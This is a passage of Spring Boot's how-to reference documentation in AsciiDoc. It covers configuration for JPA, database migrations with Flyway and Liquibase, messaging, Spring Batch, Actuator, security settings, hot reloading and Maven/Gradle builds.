builder\n\t\t\t\t.dataSource(customerDataSource())\n\t\t\t\t.packages(Customer.class)\n\t\t\t\t.persistenceUnit(\"customers\")\n\t\t\t\t.build();\n\t}\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean orderEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(orderDataSource())\n\t\t\t\t.packages(Order.class)\n\t\t\t\t.persistenceUnit(\"orders\")\n\t\t\t\t.build();\n\t}\n----\n\nThe configuration above almost works on its own. To complete the picture, you need to\nconfigure `TransactionManagers` for the two `EntityManagers` as well. If you mark one of\nthem as `@Primary`, it could be picked up by the default `JpaTransactionManager` in Spring\nBoot. The other would have to be explicitly injected into a new instance. Alternatively,\nyou might be able to use a JTA transaction manager that spans both.\n\nIf you use Spring Data, you need to configure `@EnableJpaRepositories` accordingly,\nas shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableJpaRepositories(basePackageClasses = Customer.class,\n\t\t\tentityManagerFactoryRef = \"customerEntityManagerFactory\")\n\tpublic class CustomerConfiguration {\n\t\t...\n\t}\n\n\t@Configuration\n\t@EnableJpaRepositories(basePackageClasses = Order.class,\n\t\t\tentityManagerFactoryRef = \"orderEntityManagerFactory\")\n\tpublic class OrderConfiguration {\n\t\t...\n\t}\n----\n\n\n\n[[howto-use-traditional-persistence-xml]]\n=== Use a Traditional `persistence.xml` File\nSpring Boot will not search for or use a `META-INF\/persistence.xml` by default. If you\nprefer to use a traditional `persistence.xml`, you need to define your own `@Bean` of\ntype `LocalEntityManagerFactoryBean` (with an ID of '`entityManagerFactory`') and set the\npersistence unit name there.\n\nSee\n{sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]\nfor the default settings.\n\n\n\n[[howto-use-spring-data-jpa--and-mongo-repositories]]\n=== Use Spring Data JPA and Mongo Repositories\n\nSpring Data JPA and Spring Data Mongo can both automatically create `Repository`\nimplementations for you. If they are both present on the classpath, you might have to do\nsome extra configuration to tell Spring Boot which repositories to create. The most\nexplicit way to do that is to use the standard Spring Data `+@EnableJpaRepositories+` and\n`+@EnableMongoRepositories+` annotations and provide the location of your `Repository`\ninterfaces.\n\nThere are also flags (`+spring.data.*.repositories.enabled+` and\n`+spring.data.*.repositories.type+`) that you can use to switch the auto-configured\nrepositories on and off in external configuration. Doing so is useful, for instance, in\ncase you want to switch off the Mongo repositories and still use the auto-configured\n`MongoTemplate`.\n\nThe same obstacle and the same features exist for other auto-configured Spring Data\nrepository types (Elasticsearch, Solr, and others). To work with them, change the names of\nthe annotations and flags accordingly.\n\n\n\n[[howto-use-customize-spring-datas-web-support]]\n=== Customize Spring Data's Web Support\nSpring Data provides web support that simplifies the use of Spring Data repositories in a\nweb application. Spring Boot provides properties in the `spring.data.web` namespace\nfor customizing its configuration. Note that if you are using Spring Data REST, you must\nuse the properties in the `spring.data.rest` namespace instead.\n\n\n[[howto-use-exposing-spring-data-repositories-rest-endpoint]]\n=== Expose Spring Data Repositories as REST Endpoint\nSpring Data REST can expose the `Repository` implementations as REST endpoints for you,\nprovided Spring MVC has been enabled for the application.\n\nSpring Boot exposes a set of useful properties (from the `spring.data.rest` namespace)\nthat customize the\n{spring-data-rest-javadoc}\/core\/config\/RepositoryRestConfiguration.{dc-ext}[`RepositoryRestConfiguration`].\nIf you need to provide additional customization, you should use a\n{spring-data-rest-javadoc}\/webmvc\/config\/RepositoryRestConfigurer.{dc-ext}[`RepositoryRestConfigurer`]\nbean.\n\nNOTE: If you do not specify any order on your custom `RepositoryRestConfigurer`, it runs\nafter the one Spring Boot uses internally. If you need to specify an order, make sure it\nis higher than 0.\n\n\n\n[[howto-configure-a-component-that-is-used-by-JPA]]\n=== Configure a Component that is Used by JPA\nIf you want to configure a component that JPA uses, then you need to ensure\nthat the component is initialized before JPA. When the component is auto-configured,\nSpring Boot takes care of this for you. For example, when Flyway is auto-configured,\nHibernate is configured to depend upon Flyway so that Flyway has a chance to\ninitialize the database before Hibernate tries to use it.\n\nIf you are configuring a component yourself, you can use an\n`EntityManagerFactoryDependsOnPostProcessor` subclass as a convenient way of setting up\nthe necessary dependencies. For example, if you use Hibernate Search with\nElasticsearch as its index manager, any `EntityManagerFactory` beans must be\nconfigured to depend on the `elasticsearchClient` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/elasticsearch\/HibernateSearchElasticsearchExample.java[tag=configuration]\n----\n\n\n\n[[howto-configure-jOOQ-with-multiple-datasources]]\n=== Configure jOOQ with Two DataSources\nIf you need to use jOOQ with multiple data sources, you should create your own\n`DSLContext` for each one. Refer to\n{sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration]\nfor more details.\n\nTIP: In particular, `JooqExceptionTranslator` and `SpringTransactionProvider` can be\nreused to provide similar features to what the auto-configuration does with a single\n`DataSource`.\n\n\n\n[[howto-database-initialization]]\n== Database Initialization\nAn SQL database can be initialized in different ways depending on what your stack is.\nOf course, you can also do it manually, provided the database is a separate process.\nIt is recommended to follow a single schema generation approach.\n\n\n\n[[howto-initialize-a-database-using-jpa]]\n=== Initialize a Database Using JPA\nJPA has features for DDL generation, and these can be set up to run on startup against the\ndatabase. This is controlled through two external properties:\n\n* `spring.jpa.generate-ddl` (boolean) switches the feature on and off and is vendor\nindependent. An appropriate configuration is passed to the available JPA implementation\n(e.g. Hibernate).\n* `spring.jpa.hibernate.ddl-auto` (enum) is a Hibernate feature that controls the\nbehavior in a more fine-grained way. This feature is described in more detail later in\nthis guide.\n\n\n\n[[howto-initialize-a-database-using-hibernate]]\n=== Initialize a Database Using Hibernate\nYou can set `spring.jpa.hibernate.ddl-auto` explicitly and the standard Hibernate property\nvalues are `none`, `validate`, `update`, `create`, and `create-drop`. Spring Boot chooses\na default value for you based on whether it thinks your database is embedded. It defaults\nto `create-drop` if no schema manager has been detected or `none` in all other cases. An\nembedded database is detected by looking at the `Connection` type. `hsqldb`, `h2`, and\n`derby` are embedded, and others are not. Be careful when switching from in-memory to a\n'`real`' database that you do not make assumptions about the existence of the tables and\ndata in the new platform. You either have to set `ddl-auto` explicitly or use one of the\nother mechanisms to initialize the database.\n\nNOTE: You can output the schema creation by enabling the `org.hibernate.SQL` logger. This\nis done for you automatically if you enable the\n<<boot-features-logging-console-output,debug mode>>.\n\nIn addition, a file named `import.sql` in the root of the classpath is executed on\nstartup if Hibernate creates the schema from scratch (that is, if the `ddl-auto` property\nis set to `create` or `create-drop`). This can be useful for demos and for testing if you\nare careful but is probably not something you want to be on the classpath in production.\nIt is a Hibernate feature (and has nothing to do with Spring).\n\n\n[[howto-initialize-a-database-using-spring-jdbc]]\n=== Initialize a Database\nSpring Boot can automatically create the schema (DDL scripts) of your `DataSource` and\ninitialize it (DML scripts). It loads SQL from the standard root classpath locations:\n`schema.sql` and `data.sql`, respectively. In addition, Spring Boot processes the\n`schema-${platform}.sql` and `data-${platform}.sql` files (if present), where `platform`\nis the value of `spring.datasource.platform`. This allows you to switch to\ndatabase-specific scripts if necessary. For example, you might choose to set it to the\nvendor name of the database (`hsqldb`, `h2`, `oracle`, `mysql`, `postgresql`, and so on).\n\n[NOTE]\n====\nSpring Boot automatically creates the schema of an embedded `DataSource`. This behaviour\ncan be customized by using the `spring.datasource.initialization-mode` property. For\ninstance, if you want to always initialize the `DataSource` regardless of its type:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.datasource.initialization-mode=always\n----\n====\n\nBy default, Spring Boot enables the fail-fast feature of the Spring JDBC initializer. This\nmeans that, if the scripts cause exceptions, the application fails to start. You can tune\nthat behavior by setting `spring.datasource.continue-on-error`.\n\nNOTE: In a JPA-based app, you can choose to let Hibernate create the schema or use\n`schema.sql`, but you cannot do both. Make sure to disable\n`spring.jpa.hibernate.ddl-auto` if you use `schema.sql`.\n\n\n\n[[howto-initialize-a-spring-batch-database]]\n=== Initialize a Spring Batch Database\nIf you use Spring Batch, it comes pre-packaged with SQL initialization scripts for most\npopular database platforms. Spring Boot can detect your database type and execute those\nscripts on startup. If you use an embedded database, this happens by default. You can also\nenable it for any database type, as shown in the following example:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.batch.initialize-schema=always\n----\n\nYou can also switch off the initialization explicitly by setting\n`spring.batch.initialize-schema=never`.\n\n\n\n[[howto-use-a-higher-level-database-migration-tool]]\n=== Use a Higher-level Database Migration Tool\nSpring Boot supports two higher-level migration tools: https:\/\/flywaydb.org\/[Flyway]\nand http:\/\/www.liquibase.org\/[Liquibase].\n\n[[howto-execute-flyway-database-migrations-on-startup]]\n==== Execute Flyway Database Migrations on Startup\nTo automatically run Flyway database migrations on startup, add the\n`org.flywaydb:flyway-core` to your classpath.\n\nThe migrations are scripts in the form `V<VERSION>__<NAME>.sql` (with `<VERSION>` an\nunderscore-separated version, such as '`1`' or '`2_1`'). By default, they are in a folder\ncalled `classpath:db\/migration`, but you can modify that location by setting\n`spring.flyway.locations`. This is a comma-separated list of one or more `classpath:`\nor `filesystem:` locations. For example, the following configuration would search for\nscripts in both the default classpath location and the `\/opt\/migration` directory:\n\n[source,properties,indent=0]\n----\n\tspring.flyway.locations=classpath:db\/migration,filesystem:\/opt\/migration\n----\n\nYou can also add a special `{vendor}` placeholder to use vendor-specific scripts. Assume\nthe following:\n\n[source,properties,indent=0]\n----\n\tspring.flyway.locations=classpath:db\/migration\/{vendor}\n----\n\nRather than using `db\/migration`, the preceding configuration sets the folder to use\naccording to the type of the database (such as `db\/migration\/mysql` for MySQL). The list\nof supported databases is available in\n{sc-spring-boot}\/jdbc\/DatabaseDriver.{sc-ext}[`DatabaseDriver`].\n\n{sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[`FlywayProperties`]\nprovides most of Flyway's settings and a small set of additional properties that can be\nused to disable the migrations or switch off the location checking. If you need more\ncontrol over the configuration, consider registering a `FlywayConfigurationCustomizer`\nbean.\n\nSpring Boot calls `Flyway.migrate()` to perform the database migration. If you would like\nmore control, provide a `@Bean` that implements\n{sc-spring-boot-autoconfigure}\/flyway\/FlywayMigrationStrategy.{sc-ext}[`FlywayMigrationStrategy`].\n\nFlyway supports SQL and Java https:\/\/flywaydb.org\/documentation\/callbacks.html[callbacks].\nTo use SQL-based callbacks, place the callback scripts in the `classpath:db\/migration`\nfolder. To use Java-based callbacks, create one or more beans that implement\n`Callback`. Any such beans are automatically registered with `Flyway`. They can be\nordered by using `@Order` or by implementing `Ordered`. Beans that implement the\ndeprecated `FlywayCallback` interface can also be detected, however they cannot be used\nalongside `Callback` beans.\n\nBy default, Flyway autowires the (`@Primary`) `DataSource` in your context and\nuses that for migrations. If you like to use a different `DataSource`, you can create\none and mark its `@Bean` as `@FlywayDataSource`. If you do so and want two data sources,\nremember to create another one and mark it as `@Primary`. Alternatively, you can use\nFlyway's native `DataSource` by setting `spring.flyway.[url,user,password]`\nin external properties. Setting either `spring.flyway.url` or `spring.flyway.user`\nis sufficient to cause Flyway to use its own `DataSource`. If any of the three\nproperties has not be set, the value of its equivalent `spring.datasource` property will\nbe used.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-flyway[Flyway sample] so\nthat you can see how to set things up.\n\nYou can also use Flyway to provide data for specific scenarios. For example, you can\nplace test-specific migrations in `src\/test\/resources` and they are run only when your\napplication starts for testing. Also, you can use profile-specific configuration to\ncustomize `spring.flyway.locations` so that certain migrations run only when a particular\nprofile is active. For example, in `application-dev.properties`, you might specify the\nfollowing setting:\n\n[source,properties,indent=0]\n----\n\tspring.flyway.locations=classpath:\/db\/migration,classpath:\/dev\/db\/migration\n----\n\nWith that setup, migrations in `dev\/db\/migration` run only when the `dev` profile is\nactive.\n\n\n\n[[howto-execute-liquibase-database-migrations-on-startup]]\n==== Execute Liquibase Database Migrations on Startup\nTo automatically run Liquibase database migrations on startup, add the\n`org.liquibase:liquibase-core` to your classpath.\n\nBy default, the master change log is read from `db\/changelog\/db.changelog-master.yaml`,\nbut you can change the location by setting `spring.liquibase.change-log`. In addition to\nYAML, Liquibase also supports JSON, XML, and SQL change log formats.\n\nBy default, Liquibase autowires the (`@Primary`) `DataSource` in your context and uses\nthat for migrations. If you need to use a different `DataSource`, you can create one and\nmark its `@Bean` as `@LiquibaseDataSource`. If you do so and you want two data sources,\nremember to create another one and mark it as `@Primary`. Alternatively, you can use\nLiquibase's native `DataSource` by setting `spring.liquibase.[url,user,password]` in\nexternal properties. Setting either `spring.liquibase.url` or `spring.liquibase.user`\nis sufficient to cause Liquibase to use its own `DataSource`. If any of the three\nproperties has not be set, the value of its equivalent `spring.datasource` property will\nbe used.\n\nSee\n{sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[`LiquibaseProperties`]\nfor details about available settings such as contexts, the default schema, and others.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-liquibase[Liquibase\nsample] so that you can see how to set things up.\n\n\n\n[[howto-messaging]]\n== Messaging\n\nSpring Boot offers a number of starters that include messaging. This section answers\nquestions that arise from using messaging with Spring Boot.\n\n[[howto-jms-disable-transaction]]\n=== Disable Transacted JMS Session\nIf your JMS broker does not support transacted sessions, you have to disable the\nsupport of transactions altogether. If you create your own `JmsListenerContainerFactory`,\nthere is nothing to do, since, by default it cannot be transacted. If you want to use\nthe `DefaultJmsListenerContainerFactoryConfigurer` to reuse Spring Boot's default, you\ncan disable transacted sessions, as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic DefaultJmsListenerContainerFactory jmsListenerContainerFactory(\n\t\t\tConnectionFactory connectionFactory,\n\t\t\tDefaultJmsListenerContainerFactoryConfigurer configurer) {\n\t\tDefaultJmsListenerContainerFactory listenerFactory =\n\t\t\t\tnew DefaultJmsListenerContainerFactory();\n\t\tconfigurer.configure(listenerFactory, connectionFactory);\n\t\tlistenerFactory.setTransactionManager(null);\n\t\tlistenerFactory.setSessionTransacted(false);\n\t\treturn listenerFactory;\n\t}\n----\n\nThe preceding example overrides the default factory, and it should be applied to any\nother factory that your application defines, if any.\n\n\n\n[[howto-batch-applications]]\n== Batch Applications\n\nThis section answers questions that arise from using Spring Batch with Spring Boot.\n\nNOTE: By default, batch applications require a `DataSource` to store job details. If you\nwant to deviate from that, you need to implement `BatchConfigurer`. See\n{spring-batch-javadoc}\/core\/configuration\/annotation\/EnableBatchProcessing.html[The\nJavadoc of `@EnableBatchProcessing`] for more details.\n\nFor more about Spring Batch, see the https:\/\/projects.spring.io\/spring-batch\/[Spring Batch\nproject page].\n\n\n\n[[howto-execute-spring-batch-jobs-on-startup]]\n=== Execute Spring Batch Jobs on Startup\nSpring Batch auto-configuration is enabled by adding `@EnableBatchProcessing`\n(from Spring Batch) somewhere in your context.\n\nBy default, it executes *all* `Jobs` in the application context on startup (see\n{sc-spring-boot-autoconfigure}\/batch\/JobLauncherCommandLineRunner.{sc-ext}[JobLauncherCommandLineRunner]\nfor details). You can narrow down to a specific job or jobs by specifying\n`spring.batch.job.names` (which takes a comma-separated list of job name patterns).\n\n[TIP]\n.Specifying job parameters on the command line\n====\nUnlike command line option arguments that\n<<spring-boot-features.adoc#boot-features-external-config-command-line-args,set properties\nin the `Environment`>> (i.e. by starting with `--`, such as\n`--my-property=value`), job parameters have to be specified on the command line without\ndashes (e.g. `jobParam=value`).\n====\n\nIf the application context includes a `JobRegistry`, the jobs in\n`spring.batch.job.names` are looked up in the registry instead of being autowired from the\ncontext. This is a common pattern with more complex systems, where multiple jobs are\ndefined in child contexts and registered centrally.\n\nSee\n{sc-spring-boot-autoconfigure}\/batch\/BatchAutoConfiguration.{sc-ext}[BatchAutoConfiguration]\nand\nhttps:\/\/github.com\/spring-projects\/spring-batch\/blob\/master\/spring-batch-core\/src\/main\/java\/org\/springframework\/batch\/core\/configuration\/annotation\/EnableBatchProcessing.java[@EnableBatchProcessing]\nfor more details.\n\n\n\n[[howto-actuator]]\n== Actuator\n\nSpring Boot includes the Spring Boot Actuator. This section answers questions that often\narise from its use.\n\n[[howto-change-the-http-port-or-address-of-the-actuator-endpoints]]\n=== Change the HTTP Port or Address of the Actuator Endpoints\nIn a standalone application, the Actuator HTTP port defaults to the same as the main HTTP\nport. To make the application listen on a different port, set the external property:\n`management.server.port`. To listen on a completely different network address (such as\nwhen you have an internal network for management and an external one for user\napplications), you can also set `management.server.address` to a valid IP address to which\nthe server is able to bind.\n\nFor more detail, see the\n{sc-spring-boot-actuator-autoconfigure}\/web\/server\/ManagementServerProperties.{sc-ext}[`ManagementServerProperties`]\nsource code and\n\"`<<production-ready-features.adoc#production-ready-customizing-management-server-port>>`\"\nin the \"`Production-ready features`\" section.\n\n\n\n[[howto-customize-the-whitelabel-error-page]]\n=== Customize the '`whitelabel`' Error Page\nSpring Boot installs a '`whitelabel`' error page that you see in a browser client if\nyou encounter a server error (machine clients consuming JSON and other media types should\nsee a sensible response with the right error code).\n\nNOTE: Set `server.error.whitelabel.enabled=false` to switch the default error page off.\nDoing so restores the default of the servlet container that you are using. Note that\nSpring Boot still tries to resolve the error view, so you should probably add your own\nerror page rather than disabling it completely.\n\nOverriding the error page with your own depends on the templating technology that you\nuse. For example, if you use Thymeleaf, you can add an `error.html` template.\nIf you use FreeMarker, you can add an `error.ftl` template. In general, you\nneed a `View` that resolves with a name of `error` or a `@Controller` that handles\nthe `\/error` path. Unless you replaced some of the default configuration, you should find\na `BeanNameViewResolver` in your `ApplicationContext`, so a `@Bean` named `error` would\nbe a simple way of doing that. See\n{sc-spring-boot-autoconfigure}\/web\/servlet\/error\/ErrorMvcAutoConfiguration.{sc-ext}[`ErrorMvcAutoConfiguration`]\nfor more options.\n\nSee also the section on \"`<<boot-features-error-handling, Error Handling>>`\" for details\nof how to register handlers in the servlet container.\n\n\n\n[[howto-sanitize-sensible-values]]\n=== Sanitize sensible values\nInformation returned by the `env` and `configprops` endpoints can be somewhat sensitive\nso keys matching a certain pattern are sanitized by default (i.e. their values are\nreplaced by `+******+`).\n\nSpring Boot uses sensible defaults for such keys: for instance, any key ending with the\nword \"password\", \"secret\", \"key\" or \"token\" is sanitized. It is also possible to use a\nregular expression instead, such as `+*credentials.*+` to sanitize any key that holds the\nword `credentials` as part of the key.\n\nThe patterns to use can be customized using the `management.endpoint.env.keys-to-sanitize`\nand `management.endpoint.configprops.keys-to-sanitize` respectively.\n\n\n\n[[howto-security]]\n== Security\n\nThis section addresses questions about security when working with Spring Boot, including\nquestions that arise from using Spring Security with Spring Boot.\n\nFor more about Spring Security, see the {spring-security}[Spring Security project page].\n\n\n\n[[howto-switch-off-spring-boot-security-configuration]]\n=== Switch off the Spring Boot Security Configuration\nIf you define a `@Configuration` with a `WebSecurityConfigurerAdapter` in your application,\nit switches off the default webapp security settings in Spring Boot.\n\n\n[[howto-change-the-user-details-service-and-add-user-accounts]]\n=== Change the UserDetailsService and Add User Accounts\nIf you provide a `@Bean` of type `AuthenticationManager`, `AuthenticationProvider`,\nor `UserDetailsService`, the default `@Bean` for `InMemoryUserDetailsManager` is not\ncreated, so you have the full feature set of Spring Security available (such as\nhttps:\/\/docs.spring.io\/spring-security\/site\/docs\/current\/reference\/htmlsingle\/#jc-authentication[various\nauthentication options]).\n\nThe easiest way to add user accounts is to provide your own `UserDetailsService` bean.\n\n\n\n[[howto-enable-https]]\n=== Enable HTTPS When Running behind a Proxy Server\nEnsuring that all your main endpoints are only available over HTTPS is an important\nchore for any application. If you use Tomcat as a servlet container, then\nSpring Boot adds Tomcat's own `RemoteIpValve` automatically if it detects some\nenvironment settings, and you should be able to rely on the `HttpServletRequest` to\nreport whether it is secure or not (even downstream of a proxy server that handles the\nreal SSL termination). The standard behavior is determined by the presence or absence of\ncertain request headers (`x-forwarded-for` and `x-forwarded-proto`), whose names are\nconventional, so it should work with most front-end proxies. You can switch on the valve\nby adding some entries to `application.properties`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.protocol-header=x-forwarded-proto\n----\n\n(The presence of either of those properties switches on the valve. Alternatively, you can\nadd the `RemoteIpValve` by adding a `TomcatServletWebServerFactory` bean.)\n\nTo configure Spring Security to require a secure channel for all (or some)\nrequests, consider adding your own `WebSecurityConfigurerAdapter` that adds the following\n`HttpSecurity` configuration:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\tpublic class SslWebSecurityConfigurerAdapter extends WebSecurityConfigurerAdapter {\n\n\t\t@Override\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\t\/\/ Customize the application security\n\t\t\thttp.requiresChannel().anyRequest().requiresSecure();\n\t\t}\n\n\t}\n----\n\n\n[[howto-hotswapping]]\n== Hot Swapping\n\nSpring Boot supports hot swapping. This section answers questions about how it works.\n\n\n\n[[howto-reload-static-content]]\n=== Reload Static Content\nThere are several options for hot reloading. The recommended approach is to use\n<<using-spring-boot.adoc#using-boot-devtools,`spring-boot-devtools`>>, as it provides\nadditional development-time features, such as support for fast application restarts\nand LiveReload as well as sensible development-time configuration (such as template\ncaching). Devtools works by monitoring the classpath for changes. This means that static\nresource changes must be \"built\" for the change to take affect. By default, this happens\nautomatically in Eclipse when you save your changes. In IntelliJ IDEA, the Make Project\ncommand triggers the necessary build. Due to the\n<<using-spring-boot.adoc#using-boot-devtools-restart-exclude, default restart\nexclusions>>, changes to static resources do not trigger a restart of your application.\nThey do, however, trigger a live reload.\n\nAlternatively, running in an IDE (especially with debugging on) is a good way to do\ndevelopment (all modern IDEs allow reloading of static resources and usually also allow\nhot-swapping of Java class changes).\n\nFinally, the <<build-tool-plugins.adoc#build-tool-plugins, Maven and Gradle plugins>> can\nbe configured (see the `addResources` property) to support running from the command line\nwith reloading of static files directly from source. You can use that with an external\ncss\/js compiler process if you are writing that code with higher-level tools.\n\n\n\n[[howto-reload-thymeleaf-template-content]]\n=== Reload Templates without Restarting the Container\nMost of the templating technologies supported by Spring Boot include a configuration\noption to disable caching (described later in this document). If you use the\n`spring-boot-devtools` module, these properties are\n<<using-spring-boot.adoc#using-boot-devtools-property-defaults,automatically configured>>\nfor you at development time.\n\n\n\n[[howto-reload-thymeleaf-content]]\n==== Thymeleaf Templates\nIf you use Thymeleaf, set `spring.thymeleaf.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`]\nfor other Thymeleaf customization options.\n\n\n\n[[howto-reload-freemarker-content]]\n==== FreeMarker Templates\nIf you use FreeMarker, set `spring.freemarker.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`]\nfor other FreeMarker customization options.\n\n\n\n[[howto-reload-groovy-template-content]]\n==== Groovy Templates\nIf you use Groovy templates, set `spring.groovy.template.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]\nfor other Groovy customization options.\n\n\n\n[[howto-reload-fast-restart]]\n=== Fast Application Restarts\nThe `spring-boot-devtools` module includes support for automatic application restarts.\nWhile not as fast as technologies such as\nhttp:\/\/zeroturnaround.com\/software\/jrebel\/[JRebel] it is usually significantly faster than\na \"`cold start`\". You should probably give it a try before investigating some of the more\ncomplex reload options discussed later in this document.\n\nFor more details, see the <<using-spring-boot.adoc#using-boot-devtools>> section.\n\n\n\n[[howto-reload-java-classes-without-restarting]]\n=== Reload Java Classes without Restarting the Container\nMany modern IDEs (Eclipse, IDEA, and others) support hot swapping of bytecode.\nConsequently, if you make a change that does not affect class or method signatures, it\nshould reload cleanly with no side effects.\n\n\n\n[[howto-build]]\n== Build\n\nSpring Boot includes build plugins for Maven and Gradle. This section answers common\nquestions about these plugins.\n\n\n\n[[howto-build-info]]\n=== Generate Build Information\nBoth the Maven plugin and the Gradle plugin allow generating build information containing\nthe coordinates, name, and version of the project. The plugins can also be configured\nto add additional properties through configuration. When such a file is present,\nSpring Boot auto-configures a `BuildProperties` bean.\n\nTo generate build information with Maven, add an execution for the `build-info` goal, as\nshown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>build-info<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nTIP: See the {spring-boot-maven-plugin-site}[Spring Boot Maven Plugin documentation]\nfor more details.\n\nThe following example does the same with Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tspringBoot {\n\t\tbuildInfo()\n\t}\n----\n\nTIP: See the\n{spring-boot-gradle-plugin-reference}\/#integrating-with-actuator-build-info[Spring Boot\nGradle Plugin documentation] for more details.\n\n\n\n[[howto-git-info]]\n=== Generate Git Information\n\nBoth Maven and Gradle allow generating a `git.properties` file containing information\nabout the state of your `git` source code repository when the project was built.\n\nFor Maven users, the `spring-boot-starter-parent` POM includes a pre-configured plugin to\ngenerate a `git.properties` file. To use it, add the following declaration to your POM:\n\n[source,xml,indent=0]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>pl.project13.maven<\/groupId>\n\t\t\t\t<artifactId>git-commit-id-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nGradle users can achieve the same result by using the\nhttps:\/\/plugins.gradle.org\/plugin\/com.gorylenko.gradle-git-properties[`gradle-git-properties`]\nplugin, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tplugins {\n\t\tid \"com.gorylenko.gradle-git-properties\" version \"1.5.1\"\n\t}\n----\n\nTIP: The commit time in `git.properties` is expected to match the following format:\n`yyyy-MM-dd'T'HH:mm:ssZ`. This is the default format for both plugins listed above. Using\nthis format lets the time be parsed into a `Date` and its format, when serialized to JSON,\nto be controlled by Jackson's date serialization configuration settings.\n\n\n\n[[howto-customize-dependency-versions]]\n=== Customize Dependency Versions\nIf you use a Maven build that inherits directly or indirectly from\n`spring-boot-dependencies` (for instance, `spring-boot-starter-parent`) but you want to\noverride a specific third-party dependency, you can add appropriate `<properties>`\nelements. Browse the\n{github-code}\/spring-boot-project\/spring-boot-dependencies\/pom.xml[`spring-boot-dependencies`]\nPOM for a complete list of properties. For example, to pick a different `slf4j` version,\nyou would add the following property:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<slf4j.version>1.7.5<slf4j.version>\n\t<\/properties>\n----\n\nNOTE: Doing so only works if your Maven project inherits (directly or indirectly) from\n`spring-boot-dependencies`. If you have added `spring-boot-dependencies` in your\nown `dependencyManagement` section with `<scope>import<\/scope>`, you have to redefine\nthe artifact yourself instead of overriding the property.\n\nWARNING: Each Spring Boot release is designed and tested against this specific set of\nthird-party dependencies. Overriding versions may cause compatibility issues.\n\nTo override dependency versions in Gradle, see {spring-boot-gradle-plugin-reference}\/#managing-dependencies-customizing[this section]\nof the Gradle plugin's documentation.\n\n[[howto-create-an-executable-jar-with-maven]]\n=== Create an Executable JAR with Maven\nThe `spring-boot-maven-plugin` can be used to create an executable \"`fat`\" JAR. If you\nuse the `spring-boot-starter-parent` POM, you can declare the plugin and your jars are\nrepackaged as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nIf you do not use the parent POM, you can still use the plugin. However, you must\nadditionally add an `<executions>` section, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>repackage<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nSee the {spring-boot-maven-plugin-site}\/usage.html[plugin documentation] for full usage\ndetails.\n\n\n[[howto-create-an-additional-executable-jar]]\n=== Use a Spring Boot Application as a Dependency\nLike a war file, a Spring Boot application is not intended to be used as a dependency. If\nyour application contains classes that you want to share with other projects, the\nrecommended approach is to move that code into a separate module. The separate module can\nthen be depended upon by your application and other projects.\n\nIf you cannot rearrange your code as recommended above, Spring Boot's Maven and Gradle\nplugins must be configured to produce a separate artifact that is suitable for use as a\ndependency. The executable archive cannot be used as a dependency as the\n<<appendix-executable-jar-format.adoc#executable-jar-jar-file-structure,executable jar\nformat>> packages application classes in `BOOT-INF\/classes`. This means\nthat they cannot be found when the 